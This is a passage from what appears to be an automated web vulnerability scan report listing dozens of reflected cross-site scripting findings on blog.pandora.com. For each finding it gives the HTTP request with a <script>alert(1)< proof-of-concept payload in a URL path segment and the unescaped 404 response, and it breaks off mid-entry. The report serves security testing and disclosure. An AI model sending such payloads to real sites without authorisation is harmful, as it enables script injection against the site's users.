The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29463<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives29463<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives29463<script>alert(1)< ...[SNIP]... |
3.75. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/09 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 826cd<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006826cd<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006826cd<script>alert(1)< ...[SNIP]... |
3.76. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/09 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7029<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/09a7029<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/09a7029<script>alert(1)< ...[SNIP]... |
3.77. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/10 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dc61<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2dc61<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2dc61<script>alert(1)< ...[SNIP]... |
3.78. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/10 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee470<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesee470<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesee470<script>alert(1)< ...[SNIP]... |
3.79. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/10 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eab0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20069eab0<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20069eab0<script>alert(1)< ...[SNIP]... |
3.80. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/10 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7d2c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/10f7d2c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/10f7d2c<script>alert(1)< ...[SNIP]... |
3.81. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fc20<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8fc20<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8fc20<script>alert(1)< ...[SNIP]... |
3.82. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/11 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e051<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4e051<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4e051<script>alert(1)< ...[SNIP]... |
3.83. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b74cd<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b74cd<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006b74cd<script>alert(1)< ...[SNIP]... |
3.84. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4491<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/11e4491<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/11e4491<script>alert(1)< ...[SNIP]... |
3.85. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/12 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f27b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4f27b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4f27b<script>alert(1)< ...[SNIP]... |
3.86. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/12 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b166<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7b166<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives7b166<script>alert(1)< ...[SNIP]... |
3.87. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/12 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d7d6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20064d7d6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:21 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20064d7d6<script>alert(1)< ...[SNIP]... |
3.88. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/12 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89734<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/1289734<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/1289734<script>alert(1)< ...[SNIP]... |
3.89. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/01 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 226ab<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora226ab<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora226ab<script>alert(1)< ...[SNIP]... |
3.90. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/01 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7b27<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf7b27<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf7b27<script>alert(1)< ...[SNIP]... |
3.91. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/01 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcf4c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007fcf4c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007fcf4c<script>alert(1)< ...[SNIP]... |
3.92. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/01 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0649<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/01a0649<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/01a0649<script>alert(1)< ...[SNIP]... |
3.93. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/02 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39608<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora39608<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora39608<script>alert(1)< ...[SNIP]... |
3.94. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/02 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c6d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives94c6d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives94c6d<script>alert(1)< ...[SNIP]... |
3.95. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/02 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133b4<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007133b4<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007133b4<script>alert(1)< ...[SNIP]... |
3.96. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/02 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33a6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/02b33a6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/02b33a6<script>alert(1)< ...[SNIP]... |
3.97. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/03 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac326<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraac326<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraac326<script>alert(1)< ...[SNIP]... |
3.98. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/03 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90b22<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives90b22<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives90b22<script>alert(1)< ...[SNIP]... |
3.99. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/03 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 413a3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007413a3<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007413a3<script>alert(1)< ...[SNIP]... |
3.100. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/03 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d17eb<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/03d17eb<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/03d17eb<script>alert(1)< ...[SNIP]... |
3.101. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/04 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c059<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2c059<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2c059<script>alert(1)< ...[SNIP]... |
3.102. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/04 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3228<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesb3228<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesb3228<script>alert(1)< ...[SNIP]... |
3.103. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/04 |
Issue detail
